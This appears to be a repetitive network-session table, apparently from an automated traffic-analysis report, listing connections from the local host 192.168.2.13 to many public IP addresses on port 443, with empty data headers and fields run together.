                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14564192.168.2.1349472105.5.242.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14565192.168.2.1356770120.242.65.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14566192.168.2.1332772171.220.84.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14567192.168.2.1360296210.125.169.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14568192.168.2.1336574172.161.69.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14569192.168.2.1357250120.152.137.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14570192.168.2.1344332208.202.119.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14571192.168.2.133672443.197.20.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14572192.168.2.133834862.70.133.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14573192.168.2.1340894194.156.126.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14574192.168.2.1338298119.191.176.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14575192.168.2.1343834147.117.246.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14576192.168.2.133680472.180.248.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14577192.168.2.1336394111.178.158.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14578192.168.2.1348358186.162.150.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14579192.168.2.135637271.167.125.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14580192.168.2.133573453.28.88.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14581192.168.2.1340878196.158.11.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14582192.168.2.1351202112.193.65.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14583192.168.2.13501781.177.227.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14584192.168.2.1344104190.15.64.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14585192.168.2.1357454171.15.219.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14586192.168.2.133910641.40.13.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14587192.168.2.1339192149.84.153.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14588192.168.2.135040261.8.128.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14589192.168.2.1357902101.171.98.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14590192.168.2.1359512182.203.155.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14591192.168.2.1346812116.239.221.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14592192.168.2.134013460.210.90.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14593192.168.2.1351058216.0.127.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14594192.168.2.1358096136.198.160.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14595192.168.2.1348890185.134.209.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14596192.168.2.1359786197.73.51.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14597192.168.2.1335486169.130.28.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14598192.168.2.1344686160.130.113.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14599192.168.2.133754874.60.79.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14600192.168.2.134157237.153.229.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14601192.168.2.134604814.218.210.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14602192.168.2.133738659.178.134.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14603192.168.2.1335086144.37.36.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14604192.168.2.1341332206.159.178.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14605192.168.2.134803860.161.140.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14606192.168.2.1354426129.125.78.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14607192.168.2.134142463.46.71.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14608192.168.2.135910838.145.114.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14609192.168.2.13565409.129.6.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14610192.168.2.1351194148.206.8.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14611192.168.2.135228059.8.49.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14612192.168.2.133762868.237.47.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14613192.168.2.135369489.164.184.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14614192.168.2.133507863.200.229.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14615192.168.2.1334200189.84.184.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14616192.168.2.1347330179.116.191.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14617192.168.2.1351240175.178.87.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14618192.168.2.1360896178.85.108.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14619192.168.2.135678040.144.15.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14620192.168.2.1342416166.25.180.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14621192.168.2.133296685.33.121.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14622192.168.2.133861213.247.246.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14623192.168.2.1334352177.185.142.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14624192.168.2.134089093.106.214.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14625192.168.2.1356598201.111.28.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14626192.168.2.1356400199.47.75.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14627192.168.2.1353790184.70.188.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14628192.168.2.133973854.252.167.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14629192.168.2.1341958154.253.47.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14630192.168.2.1359758140.29.38.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14631192.168.2.1357120126.51.195.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14632192.168.2.135051641.73.89.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14633192.168.2.135514234.145.190.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14634192.168.2.133989688.138.222.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14635192.168.2.1339356156.40.27.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14636192.168.2.135262440.37.55.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14637192.168.2.134681659.2.239.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14638192.168.2.133926470.147.189.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14639192.168.2.133951283.201.60.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14640192.168.2.134093867.134.32.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14641192.168.2.1339224161.132.141.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14642192.168.2.135343895.244.89.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14643192.168.2.135958040.58.28.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14644192.168.2.1341272146.242.25.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14645192.168.2.1352938216.133.45.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14646192.168.2.1334636182.123.170.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14647192.168.2.1342260123.192.212.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14648192.168.2.134319858.96.199.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14649192.168.2.1359074212.135.125.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14650192.168.2.1349914168.4.215.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14651192.168.2.135501817.180.102.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14652192.168.2.13412048.140.134.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14653192.168.2.1336392124.123.75.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14654192.168.2.1344454114.37.179.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14655192.168.2.135271477.20.115.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14656192.168.2.1360998117.216.166.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14657192.168.2.1335348151.235.85.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14658192.168.2.135071834.98.153.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14659192.168.2.1352384106.163.225.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14660192.168.2.133528889.87.132.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14661192.168.2.135840849.94.45.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14662192.168.2.13454129.154.168.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14663192.168.2.135947864.23.195.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14664192.168.2.1340350198.118.96.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14665192.168.2.1357434218.77.22.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14666192.168.2.135375288.48.110.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14667192.168.2.1353044219.130.94.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14668192.168.2.134388657.75.17.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14669192.168.2.1354484156.140.34.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14670192.168.2.135693250.114.151.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14671192.168.2.135487688.179.124.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14672192.168.2.133570873.26.223.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14673192.168.2.133680837.213.145.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14674192.168.2.1344272182.148.130.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14675192.168.2.1346222187.115.193.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14676192.168.2.133494092.28.36.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14677192.168.2.1350986103.190.243.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14678192.168.2.135165282.225.161.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14679192.168.2.135771290.65.223.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14680192.168.2.1340420112.196.239.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14681192.168.2.135050457.169.136.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14682192.168.2.1348024207.144.38.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14683192.168.2.1359392134.112.179.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14684192.168.2.1347972180.1.197.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14685192.168.2.1338184157.208.83.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14686192.168.2.1352234102.58.182.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14687192.168.2.135166213.203.143.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14688192.168.2.1345806186.74.90.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14689192.168.2.134217067.168.176.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14690192.168.2.1333862159.169.200.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14691192.168.2.1358504192.3.240.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14692192.168.2.1344922192.25.0.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14693192.168.2.1351114207.184.199.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14694192.168.2.134610080.82.42.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14695192.168.2.133758239.182.245.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14696192.168.2.1340926203.107.173.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14697192.168.2.135418868.66.191.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14698192.168.2.133660652.153.175.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14699192.168.2.1350088123.229.4.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14700192.168.2.1359384158.6.101.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14701192.168.2.135447847.183.111.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14702192.168.2.1332864141.6.16.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14703192.168.2.133407097.138.62.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14704192.168.2.1357092183.90.141.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14705192.168.2.1339926105.219.79.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14706192.168.2.1351400162.71.105.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14707192.168.2.1355300134.109.119.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14708192.168.2.1350900195.67.75.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14709192.168.2.1358260223.125.197.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14710192.168.2.1359004135.190.14.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14711192.168.2.133873413.223.163.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14712192.168.2.1356376112.45.191.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14713192.168.2.1345284167.147.42.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14714192.168.2.133963076.207.116.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14715192.168.2.1341232212.142.151.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14716192.168.2.1335282156.54.253.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14717192.168.2.134959063.54.153.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14718192.168.2.134321034.194.242.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14719192.168.2.1346046155.55.206.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14720192.168.2.1338694136.186.115.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14721192.168.2.134710443.110.176.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14722192.168.2.1342826220.232.46.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14723192.168.2.1333064156.78.99.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14724192.168.2.1336134122.144.138.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14725192.168.2.1335250223.240.186.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14726192.168.2.1349256212.173.255.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14727192.168.2.133621437.74.11.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14728192.168.2.1360862208.97.64.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14729192.168.2.135676269.248.208.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14730192.168.2.1348452123.108.149.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14731192.168.2.1351726100.152.138.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14732192.168.2.1336034142.129.170.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14733192.168.2.1339672202.72.119.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14734192.168.2.135874048.31.86.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14735192.168.2.1348548104.129.180.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14736192.168.2.133934671.55.242.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14737192.168.2.1343372112.162.207.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14738192.168.2.1351010178.23.150.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14739192.168.2.1337376150.141.46.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14740192.168.2.1349390108.41.0.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14741192.168.2.1340840219.90.152.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14742192.168.2.133756070.105.47.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14743192.168.2.1356856141.12.132.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14744192.168.2.1354482125.9.2.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14745192.168.2.1352100186.189.109.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14746192.168.2.134756480.198.123.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14747192.168.2.134932839.250.46.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14748192.168.2.1354110187.159.82.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14749192.168.2.1358410221.55.50.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14750192.168.2.136096017.17.120.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14751192.168.2.1356612159.71.159.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14752192.168.2.1346614136.160.32.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14753192.168.2.1339310116.148.6.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14754192.168.2.1350010199.173.79.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14755192.168.2.133703296.95.136.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14756192.168.2.135453691.116.182.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14757192.168.2.1338652130.80.92.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14758192.168.2.133289484.235.177.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14759192.168.2.1348574193.89.233.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14760192.168.2.134765464.31.159.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14761192.168.2.13392365.240.195.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14762192.168.2.1335754154.72.172.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14763192.168.2.1345932180.63.204.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14764192.168.2.13412228.181.180.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14765192.168.2.133990684.12.225.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14766192.168.2.1355150113.83.82.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14767192.168.2.135503866.89.146.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14768192.168.2.134441037.113.90.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14769192.168.2.135368270.143.87.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14770192.168.2.134592297.163.242.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14771192.168.2.1350236204.54.204.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14772192.168.2.1338236158.34.156.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14773192.168.2.135024045.174.103.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14774192.168.2.1344938197.182.186.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14775192.168.2.1359572148.205.177.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14776192.168.2.1341922118.98.252.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14777192.168.2.1353684188.92.67.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14778192.168.2.1347358208.49.16.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14779192.168.2.133545045.1.83.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14780192.168.2.1356352175.94.111.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14781192.168.2.1333068196.188.18.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14782192.168.2.13604785.110.237.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14783192.168.2.133505427.174.167.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14784192.168.2.1354726150.21.137.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
